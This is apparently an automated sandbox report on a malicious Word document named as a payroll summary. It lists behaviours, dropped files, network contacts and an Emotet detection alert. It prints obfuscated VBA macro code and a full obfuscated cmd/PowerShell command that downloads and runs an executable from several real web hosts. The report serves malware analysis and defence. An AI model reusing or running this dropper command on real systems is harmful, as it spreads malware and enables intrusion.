oSHfwP / 97607 / Fix(PiXMK)) + 51922 - CLng(IvRTji + CLng(53493)) + YzVXj + 74165 * lhjZJ - CStr(76315) / RhWTjG / CLng(RvIPb)oqQpF = FjfdrjItpf = (RBSijw / wULGE / 24869 / Fix(FiSuR)) + 82532 - CLng(ziGmE + CLng(59119)) + DwIcP + 43585 * alJGTd - CStr(14555) / ucaQjN / CLng(pwYoSU)End FunctionFunction VCRPjlv(IjuBXbKwG)MsfRK = WCioqJzInzNL = (ndLnv / EIJDbE / 58389 / Fix(ZRbBS)) + 23509 - CLng(rzlaa + CLng(65862)) + jLabG + 28100 * ijrWWq - CStr(27225) / bNlfYY / CLng(Mwuzkv)ZNUGEb = czzPaqjiwVGw = (YovKc / zijHdk / 4585 / Fix(iCQmm)) + 91653 - CLng(NnPzhG + CLng(55246)) + zddzJ + 2410 * Zwbmw - CStr(96400) / qlqod / CLng(cjjUC)KAfMv = WNidAmGFcUKA = (AuwdGs / XoRuJu / 70652 / Fix(YtjjCb)) + 71080 - CLng(NlEvXz + CLng(418)) + YTFYP + 7138 * GCHwY - CStr(33444) / qrIPhi / CLng(izVPKj)VCRPjlv = IjuBXbKwGCzFYoF = ppMbUcdvcMS = (uMmHSR / tWjIFU / 19906 / Fix(EBajL)) + 24946 - CLng(CvoMr + CLng(15265)) + CsCrE + 94251 * KzGXic - CStr(37420) / DWAhY / CLng(tCdGR)End FunctionFunction wQpJm(ByVal LYpRJHtwuOCsR As String, mGqOdYnIP, XwERnXf)On Error Resume NextKqTFaT = TrGNPNuETMh = (hwsSMJ / cIqZlm / 6257 / Fix(UdBwKk)) + 99750 - CLng(zIkTK + CLng(58511)) + iQYhMN + 97397 * sQkPK - CStr(2629) / cdKiab / 
CLng(QXAhi)RvCwZNlBhCkjjj = JcqYwTHJMFrRV + StrReverse(LYpRJHtwuOCsR) + IfaUpMQjGJEOPABh = fDsPaLrtXQX = (REzJk / fsVddV / 62028 / Fix(uFrIKY)) + 25020 - CLng(RjsEOE + CLng(95958)) + tQjqK + 99257 * GPEBl - CStr(20402) / PuuPWl / CLng(OFzFf)fBZnrWF = PRfibuCkMmpl + Mid(qltFWbbrUwKwh + RvCwZNlBhCkjjj + QiKjlfM, ojWaqIpCHFdcuR + mGqOdYnIP + zciEwvSVj, XwERnXf) + ilFCCEGirwJjwSBSqFU = RzJKHaQDWO = (jHWkzE / XuDUL / 31391 / Fix(tludbP)) + 28503 - CLng(Rmvrvz + CLng(61212)) + oauwP + 55975 * RSmEzK - CStr(27312) / zuaNpV / CLng(uwXrqk)wQpJm = IIDrcPuRTRQp + fBZnrWF + KpLRiDHzwVqwNfwZ = mLcJdGizkj = (JzzrPF / GNndqL / 75692 / Fix(AfBPV)) + 89182 - CLng(diBALJ + CLng(21517)) + DWQVMm + 83705 * zZISJ - CStr(97872) / lwqiFD / CLng(ULjPTV)PudvSj = ZpbfJDqMbki = (PCVbFs / CFpzT / 42995 / Fix(iffXr)) + 29268 - CLng(LIPCwc + CLng(88830)) + zEioZb + 24375 * BpZdE - CStr(40122) / dMmMU / CLng(jEtPT)End FunctionFunction tGYJQ(XFkSi)mWGdhR = YqIlpJZTSAl = (FXSSd / JRjPQL / 65699 / Fix(ZwEDWb)) + 57589 - CLng(MlViAA + CLng(74155)) + mjjFq + 29411 * oABHT - CStr(83487) / rZHTpa / CLng(PdJvK)hzufI = ccjicwvQCVT = (Eltva / KLpXGW / 19234 / Fix(EVrGVw)) + 78568 - CLng(wLviU + CLng(60437)) + zMIplG + 50126 * CTzwTm - CStr(10732) / HSSGZ / CLng(wzVVo)izwLfh = KwjYaipmWAVc = (lnMCZF / QIUQR / 76794 / Fix(CXnSm)) + 88802 - CLng(bauscr + CLng(70057)) + dUzMs + 94297 * kJGcT - CStr(88925) / MIIqdm / CLng(ihjiw)MRJzN = GiAQFvqniMK = (AkOljl / zuumP / 56881 / Fix(mzSzIO)) + 61618 - CLng(LLrDvV + CLng(93701)) + EVZIzZ + 95618 * aLzqLj - CStr(26345) / bAVqV / CLng(DvuMZD)End FunctionFunction zPHvPqrDOGFFzX()On Error Resume NextfqsASq = qVzNBZzPpcb = (qbuAGG / RiOkzu / 73604 / Fix(UGpstw)) + 20811 - CLng(CIojF + CLng(11453)) + EkwEDE + 92018 * uLQzMH - CStr(25964) / HzicI / CLng(jhBfV)mpIFv = ncFjJQovrp = (Irrnd / TfBFz / 14167 / Fix(bCRKN)) + 78728 - CLng(YFhYNH + CLng(45110)) + FfziEw + 46549 * MzLml - CStr(31007) / hfwYhM / CLng(dhCPvD)qaBbOcw = wQpJm("i.%@S5i V/ %^c^EzK", 80769 + 3 - 80769, 
- source
- Static Parser
- relevance
- 10/10
-
Creates a writable file in a temporary directory
- details
-
"WINWORD.EXE" created file "%TEMP%\~DF2F148B5B5B91DB95.TMP"
"WINWORD.EXE" created file "%TEMP%\~DF4100A96C945085FB.TMP" - source
- API Call
- relevance
- 1/10
-
Creates mutants
- details
-
"\Sessions\1\BaseNamedObjects\Local\10MU_ACBPIDS_S-1-5-5-0-57312"
"\Sessions\1\BaseNamedObjects\Local\10MU_ACB10_S-1-5-5-0-57312"
"\Sessions\1\BaseNamedObjects\Global\552FFA80-3393-423d-8671-7BA046BB5906"
"\Sessions\1\BaseNamedObjects\Local\ZonesCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZoneAttributeCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesLockedCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Global\MTX_MSO_Formal1_S-1-5-21-4162757579-3804539371-4239455898-1000"
"\Sessions\1\BaseNamedObjects\Global\MTX_MSO_AdHoc1_S-1-5-21-4162757579-3804539371-4239455898-1000"
"\Sessions\1\BaseNamedObjects\Global\MsoShellExtRegAccess_S-1-5-21-4162757579-3804539371-4239455898-1000"
"Local\ZonesCounterMutex"
"Global\MTX_MSO_AdHoc1_S-1-5-21-4162757579-3804539371-4239455898-1000"
"Local\ZonesLockedCacheCounterMutex"
"Global\MsoShellExtRegAccess_S-1-5-21-4162757579-3804539371-4239455898-1000"
"Local\10MU_ACBPIDS_S-1-5-5-0-57312"
"Local\ZoneAttributeCacheCounterMutex"
"Local\ZonesCacheCounterMutex"
"Global\552FFA80-3393-423d-8671-7BA046BB5906" - source
- Created Mutant
- relevance
- 3/10
-
Drops files marked as clean
- details
- Antivirus vendors marked dropped file "~WRD0002.tmp" as clean (type is "Composite Document File V2 Document Cannot read section info")
- source
- Binary File
- relevance
- 10/10
-
Loads rich edit control libraries
- details
- "WINWORD.EXE" loaded module "%COMMONPROGRAMFILES%\microsoft shared\OFFICE14\RICHED20.DLL" at 639C0000
- source
- Loaded Module
-
Loads the .NET runtime environment
- details
- "powershell.exe" loaded module "%WINDIR%\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll" at 62160000
- source
- Loaded Module
-
Process launched with changed environment
- details
-
Process "cmd.exe" was launched with new environment variables: "WecVersionForRosebud.9CC="4""
Process "powershell.exe" was launched with new environment variables: "%lhmbWskWwNVkUzp%="oQllFASCBHr", %HvpurunsRmnvjbm%="zJlPRBwG", %musHwkwosI%="er", %fFhDGzjnXmhYvNz%="hHRrroJFEpzXJ", %mGqOdYnIP%="ll", %fBZnrWF%="ow", %dowlFKYHb%="ow", %GTHGTVYqDCTUTHV%="JNMwizhaTsz", %pKskGkVXEDjT%="p", %oXmdLMdsYfUoN%="s", %LYpRJHtwuOCsR%="p", %XwERnXf%="he""
Process "57463.exe" was launched with modified environment variables: "PSModulePath" - source
- Monitored Target
- relevance
- 10/10
-
Removes Office resiliency keys (often used to avoid problems opening documents)
- details
-
"WINWORD.EXE" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS"; Key: "&'F")
"WINWORD.EXE" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS"; Key: "32G")
"WINWORD.EXE" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS"; Key: "6&F")
"WINWORD.EXE" (Access type: "DELETE"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS") - source
- Registry Access
- relevance
- 10/10
-
Runs shell commands
- details
-
"Cmd NiFNFLos YkMLGzjoazWTFMzoErTtjZAZ btnSkEoS & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %HvpurunsRmnvjbm%=zJlPRBwG&&set %pKskGkVXEDjT%=p&&set %dowlFKYHb%=o^w&&set %GTHGTVYqDCTUTHV%=JNMwizhaTsz&&set %LYpRJHtwuOCsR%=!%pKskGkVXEDjT%!&&set %fFhDGzjnXmhYvNz%=hHRrroJFEpzXJ&&set %musHwkwosI%=e^r&&set %fBZnrWF%=!%dowlFKYHb%!&&set %oXmdLMdsYfUoN%=s&&set %lhmbWskWwNVkUzp%=oQllFASCBHr&&set %XwERnXf%=he&&set %mGqOdYnIP%=ll&&!%LYpRJHtwuOCsR%!!%fBZnrWF%!!%musHwkwosI%!!%oXmdLMdsYfUoN%!!%XwERnXf%!!%mGqOdYnIP%! ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 
9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um
19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um
[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112)
[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+'
[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74)
[CHA'+'R]39 -CReplace 9Um1'+'xA9Um
'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC'
[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106)
[cHar]124))" on 2018-5-17.14:53:49.766 - source
- Monitored Target
- relevance
- 5/10
-
Scanning for window names
- details
-
"WINWORD.EXE" searching for class "REListbox20W"
"WINWORD.EXE" searching for class "OfficeTooltip"
"WINWORD.EXE" searching for class "MsoCommandBarPopup"
"WINWORD.EXE" searching for class "mspim_wnd32"
"WINWORD.EXE" searching for class "MSOBALLOON"
"WINWORD.EXE" searching for class "MsoHelp10"
"WINWORD.EXE" searching for class "AgentAnim" - source
- API Call
- relevance
- 10/10
-
Spawns new processes
- details
-
Spawned process "cmd.exe" (UID: 00010503-00004016), Spawned process "powershell.exe", Spawned process "57463.exe", Spawned process "cmnmspthrd.exe" - source
- Monitored Target
- relevance
- 3/10
-
Contacts domains
-
Installation/Persistence
-
Dropped files
- details
-
"57463.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
"~$172 Payroll Summary.doc" has type "data"
"09172 Payroll Summary.LNK" has type "MS Windows shortcut Item id list present Points to a file or directory Has Relative path Archive ctime=Thu May 17 20:52:27 2018 mtime=Thu May 17 20:52:27 2018 atime=Thu May 17 20:52:42 2018 length=167424 window=hide"
"09172%20Payroll%20Summary.doc.lnk" has type "MS Windows shortcut Item id list present Points to a file or directory Has Description string Has Relative path Has command line arguments Archive ctime=Thu May 17 20:52:27 2018 mtime=Thu May 17 20:52:27 2018 atime=Thu May 17 20:52:42 2018 length=167424 window=hide"
"index.dat" has type "data"
"~WRD0000.tmp" has type "Composite Document File V2 Document Little Endian Os: Windows Version 6.1 Code page: 1252 Title: Ryfewujashowavae46504 Subject: Ryfewujasho58022 Author: Ryfewuja84323 Template: Normal Revision Number: 1 Name of Creating Application: Microsoft Office Word Create Time/Date: Thu May 17 19:45:00 2018 Last Saved Time/Date: Thu May 17 19:45:00 2018 Number of Pages: 1 Number of Words: 0 Number of Characters: 5 Security: 0"
"~WRD0002.tmp" has type "Composite Document File V2 Document Cannot read section info"
"QR3RTP9CEYNQI3ODIF1G.temp" has type "data"
"~WRS{84ED4C61-472A-4119-8DE6-9124328149A8}.tmp" has type "data"
"~WRD0003.tmp" has type "Composite Document File V2 Document Little Endian Os: Windows Version 6.1 Code page: 1252 Title: Ryfewujashowavae46504 Subject: Ryfewujasho58022 Template: Normal Revision Number: 1 Name of Creating Application: Microsoft Office Word Create Time/Date: Thu May 17 19:45:00 2018 Last Saved Time/Date: Thu May 17 23:07:00 2018 Number of Pages: 1 Number of Words: 1 Number of Characters: 7 Security: 0"
"~$Normal.dotm" has type "data" - source
- Binary File
- relevance
- 3/10
-
Touches files in the Windows directory
- details
-
"WINWORD.EXE" touched file "C:\Windows\AppPatch\sysmain.sdb"
"WINWORD.EXE" touched file "C:\Windows\Globalization\Sorting\SortDefault.nls"
"WINWORD.EXE" touched file "C:\Windows\Fonts\StaticCache.dat"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\System32\en-US\setupapi.dll.mui"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Caches\cversions.1.db"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000c.db"
"WINWORD.EXE" touched file "C:\Windows\System32\rsaenh.dll"
"WINWORD.EXE" touched file "C:\Windows\System32\en-US\KernelBase.dll.mui"
"WINWORD.EXE" touched file "C:\Windows\System32\msxml6r.dll"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{84ED4C61-472A-4119-8DE6-9124328149A8}.tmp"
"WINWORD.EXE" touched file "C:\Windows\System32\en-US\msctf.dll.mui"
"WINWORD.EXE" touched file "C:\Windows\System32\spool\drivers\w32x86\3\sendtoonenote.BUD"
"WINWORD.EXE" touched file "C:\Windows\System32\spool\drivers\w32x86\3\sendtoonenote.gpd" - source
- API Call
- relevance
- 7/10
-
Network Related
-
Found potential URL in binary/memory
- details
-
Pattern match: "9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9U"
Pattern match: "http://schemas.openxmlformats.org/drawingml/2006/main"
Heuristic match: "ifcingenieria.cl" - source
- File/Memory
- relevance
- 10/10
-
System Security
-
Hooks API calls
- details
-
"VariantClear@OLEAUT32.DLL" in "WINWORD.EXE"
"VariantChangeType@OLEAUT32.DLL" in "WINWORD.EXE"
"SysAllocStringByteLen@OLEAUT32.DLL" in "WINWORD.EXE"
"OleLoadFromStream@OLE32.DLL" in "WINWORD.EXE"
"SysFreeString@OLEAUT32.DLL" in "WINWORD.EXE" - source
- Hook Detection
- relevance
- 10/10
-
Unusual Characteristics
-
Installs hooks/patches the running process
- details
-
"WINWORD.EXE" wrote bytes "cd596467" to virtual address "0x6ADECA70" (part of module "GFX.DLL")
"WINWORD.EXE" wrote bytes "3d086b67" to virtual address "0x68AB0BA8" (part of module "MSO.DLL")
"WINWORD.EXE" wrote bytes "028b6367" to virtual address "0x6B16F530" (part of module "WWLIB.DLL")
"WINWORD.EXE" wrote bytes "6e317d67" to virtual address "0x63B110AC" (part of module "MSPTLS.DLL")
"WINWORD.EXE" wrote bytes "e936551af1" to virtual address "0x776F3EAE" ("VariantClear@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "59436467" to virtual address "0x69AB78E4" (part of module "OART.DLL")
"WINWORD.EXE" wrote bytes "c4ca937780bb9377aa6e94779fbb937708bb937746ce937761389477de2f9477d0d9937700000000177958764f9158767f6f5876f4f7587611f75876f2835876857e587600000000" to virtual address "0x70691000" (part of module "MSIMG32.DLL")
"WINWORD.EXE" wrote bytes "e99e48f1f0" to virtual address "0x77943D01" ("SetUnhandledExceptionFilter@KERNEL32.DLL")
"WINWORD.EXE" wrote bytes "816d7f67" to virtual address "0x63A09904" (part of module "RICHED20.DLL")
"WINWORD.EXE" wrote bytes "b800000000663d33c0baac461f0068dcf5de62c3" to virtual address "0x0020F05C"
"WINWORD.EXE" wrote bytes "ba80502700b98b7bde62ffe1" to virtual address "0x0021173A"
"WINWORD.EXE" wrote bytes "2ef1aa67" to virtual address "0x2FE21B94" (part of module "WINWORD.EXE")
"WINWORD.EXE" wrote bytes "b800000000663d33c0baec461f0068dcf5de62c3" to virtual address "0x0020F07C"
"WINWORD.EXE" wrote bytes "e923991cf1" to virtual address "0x776F5DEE" ("VariantChangeType@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "e960331af1" to virtual address "0x776F4731" ("SysAllocStringByteLen@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "bad02e6805b98b7bde62ffe1" to virtual address "0x002105BE"
"WINWORD.EXE" wrote bytes "b800000000663d33c0baac471f0068dcf5de62c3" to virtual address "0x0020F0DC"
"WINWORD.EXE" wrote bytes "babcb67005b98b7bde62ffe1" to virtual address "0x00210C36"
"WINWORD.EXE" wrote bytes "ba04ac6905b98b7bde62ffe1" to virtual address "0x00211712"
"WINWORD.EXE" wrote bytes "b800000000663d33c0baec471f0068dcf5de62c3" to virtual address "0x0020F0FC" - source
- Hook Detection
- relevance
- 10/10
File Details
09172 Payroll Summary.doc
- Filename
- 09172 Payroll Summary.doc
- Size
- 164KiB (167424 bytes)
- Type
- doc office
- Description
- Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Ryfewujashowavae46504, Subject: Ryfewujasho58022, Author: Ryfewuja84323, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu May 17 08:45:00 2018, Last Saved Time/Date: Thu May 17 08:45:00 2018, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
- Architecture
- WINDOWS
- SHA256
- 1533b6f547784d1f220e52dc4509ea45e55ccf3de5a1ea1849ebad89de1c5495
- MD5
- 2a1e6f619f0c407cb8b15b67f869df26
- SHA1
- 51fa8d9e54104ae33fda32aabe2cead6c36f9587
Classification (TrID)
- 54.2% (.DOC) Microsoft Word document
- 32.2% (.DOC) Microsoft Word document (old ver.)
- 13.5% (.) Generic OLE2 / Multistream Compound File
Hybrid Analysis
Analysed 5 processes in total (System Resource Monitor).
-
WINWORD.EXE
/n "C:\09172 Payroll Summary.doc"
(PID: 2508)
-
cmd.exe
(PID: 4016)
-
powershell.exe
(PID: 2408)
- 57463.exe (PID: 3220) 14/64
- cmnmspthrd.exe (PID: 2240) 14/64
- 57463.exe (PID: 3220) 14/64
- powershell.exe (PID: 2408)
- cmd.exe (PID: 4016)
Network Analysis
DNS Requests
Domain | Address | Registrar | Country |
---|---|---|---|
ifcingenieria.cl | 138.0.120.12 (TTL: 1499) | - | Chile |
Contacted Hosts
IP Address | Port/Protocol | Associated Process | Details |
---|---|---|---|
138.0.120.12 | 80/TCP | powershell.exe (PID: 2408) | Chile |
37.120.170.231 | 443/TCP | cmnmspthrd.exe (PID: 2240) | Germany |
81.21.67.85 | 8080/TCP | cmnmspthrd.exe (PID: 2240) | United Kingdom |
HTTP Traffic
Endpoint | Request | URL | Details |
---|---|---|---|
138.0.120.12:80 (ifcingenieria.cl) | GET | ifcingenieria.cl/76j4qo/ | GET /76j4qo/ HTTP/1.1; Host: ifcingenieria.cl; Connection: Keep-Alive |
138.0.120.12:80 (ifcingenieria.cl) | GET | ifcingenieria.cl/76j4qo/ | GET /76j4qo/ HTTP/1.1; Host: ifcingenieria.cl; Connection: Keep-Alive; 200 OK |
81.21.67.85:8080 | GET | 81.21.67.85/ | GET / HTTP/1.1Cookie: 62407=0mqUhhn6Ge6ZIHkHU3CFqP7xYqej0rGgy+wGw5ndDq8Y7dmCX0C+18pBoXCPgtAI2AHEproTMZTQxYa3eOceuxKqyh1npx8An8iLKyndBa/Y8Il01WMZjWWmaa80aiXHMR2kbeze2Gp/QYLpxFl2h9lrC/EbDA8+MCECMhL+SY3/p9PE0uGMes2MadeydHxmHjs9Vmu0DNJJgHVDAObrjzLwhtwyJk0uKPdKHgMdMlPY+0lHdSuMkdvJTjwYjtcVybE5moUeIkTxLhS36xYp+NFW7H0HCHo2VbKT9VXp1K4nFGaCph+4I7J1wyA2XsEb8DrYkoSk//Txln5mc++AKekbssIuRj0POoRkrbRjGI86Sqq2uMAQrW7xW/LvOWwtZ1v7pWLi5YNW00Ium6x1h4AYn/s=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4... 200 OK More Details |
Suricata Alerts
Event | Category | Description | SID |
---|---|---|---|
local -> 81.21.67.85:8080 (TCP) | A Network Trojan was detected | ETPRO TROJAN W32/Emotet CnC Checkin | 2830701 |
138.0.120.12 -> local:49164 (TCP) | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP | 2018959 |
138.0.120.12 -> local:49164 (TCP) | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download | 2016538 |
138.0.120.12 -> local:49164 (TCP) | Misc activity | ET INFO EXE - Served Attached HTTP | 2014520 |
Extracted Files
Malicious 1
- 57463.exe
  - Size: 232KiB (237568 bytes)
  - Type: peexe executable
  - Description: PE32 executable (GUI) Intel 80386, for MS Windows
  - AV Scan Result: Labeled as "GenKryptik.BMLF" (14/64)
  - Runtime Process: 57463.exe (PID: 3220)
  - MD5: 35832c2b7c2287d532ee0e0abc1ae5f1
  - SHA1: 253685c4375976ff4b31e5112c82272037ab42e3
  - SHA256: ef7f7e9aef5a6bc1e5b0a3bf476dae6cb2ef48cae4283597c4b5d30ef7fdd8a5
Clean 1
- ~WRD0002.tmp
  - Size: 5.5KiB (5632 bytes)
  - Type: doc office
  - Description: Composite Document File V2 Document, Cannot read section info
  - AV Scan Result: 0/58
  - MD5: 0f570f748eeacf89941ee8a9fb47cd63
  - SHA1: 06465dd291b931826588f00a6ad8ffd4c3b213d2
  - SHA256: e1f37d99490cd216b2fc6fdd9a161b1fa63273f7d0a14de4fff287d8286ca2b0
Informative 9
- 09172 Payroll Summary.LNK
  - Size: 518B (518 bytes)
  - Type: lnk
  - Description: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu May 17 20:52:27 2018, mtime=Thu May 17 20:52:27 2018, atime=Thu May 17 20:52:42 2018, length=167424, window=hide
  - Runtime Process: WINWORD.EXE (PID: 2508)
  - MD5: b11404498d8c89426a4a5d85bd243370
  - SHA1: 9756b01402e7f458601fd3c68dc19883817c48b9
  - SHA256: 92228da4fe863673ee0bead122b43f48c9f18ffa128c3dd10eca1035d03ef54a
- ~$Normal.dotm
  - Size: 162B (162 bytes)
  - Type: data
  - Runtime Process: WINWORD.EXE (PID: 2508)
  - MD5: 6e2a1743a37219f4d509c4059614cba9
  - SHA1: 97ef035ed407cd69a19d749dd58d8cbc73dcda5c
  - SHA256: 6051e171b7617fc5e1cb68bcff6b5a2681ed039120209907cf9c947f9b5c08ec
- QR3RTP9CEYNQI3ODIF1G.temp
  - Size: 7.8KiB (8016 bytes)
  - Type: data
  - Runtime Process: powershell.exe (PID: 2408)
  - MD5: 15ddb3d8662ed7e21c594031682e7b68
  - SHA1: 53b2df953fcac08e6f88a3c92bc02d0401b63a7a
  - SHA256: 4ca7f90985dc96207c7fc8e2be92ef8ebd23e636f44946edd717b0df3cf0a4f3
- ~WRD0000.tmp
  - Size: 44KiB (45056 bytes)
  - Type: doc office
  - Description: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Ryfewujashowavae46504, Subject: Ryfewujasho58022, Author: Ryfewuja84323, Template: Normal, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu May 17 19:45:00 2018, Last Saved Time/Date: Thu May 17 19:45:00 2018, Number of Pages: 1, Number of Words: 0, Number of Characters: 5, Security: 0
  - Runtime Process: WINWORD.EXE (PID: 2508)
  - MD5: 436c44134019873484df35e2873944f8
  - SHA1: fb1b95465e7f077dacc790b9930981192831402c
  - SHA256: 0e19cfa277b1a1800e05b2c7e508fec3dd69fc57bc8a7a0bdf940385e613c5cd
- index.dat
  - Size: 171B (171 bytes)
  - Type: data
  - Runtime Process: cmnmspthrd.exe (PID: 2240)
  - MD5: b31d5d974bf1e459d31dd1a0e7b4f505
  - SHA1: 6fa91f0e73c9f3c996e382882d04383e73378b28
  - SHA256: 2648f11bf17ec2ba950912a455b0712d912329952e614bd00d88dc5505136072
- ~WRS{84ED4C61-472A-4119-8DE6-9124328149A8}.tmp
  - Size: 1KiB (1024 bytes)
  - Type: data
  - Runtime Process: WINWORD.EXE (PID: 2508)
  - MD5: 5d4d94ee7e06bbb0af9584119797b23a
  - SHA1: dbb111419c704f116efa8e72471dd83e86e49677
  - SHA256: 4826c0d860af884d3343ca6460b0006a7a2ce7dbccc4d743208585d997cc5fd1
- ~$172 Payroll Summary.doc
  - Size: 162B (162 bytes)
  - Type: data
  - Runtime Process: WINWORD.EXE (PID: 2508)
  - MD5: 6e2a1743a37219f4d509c4059614cba9
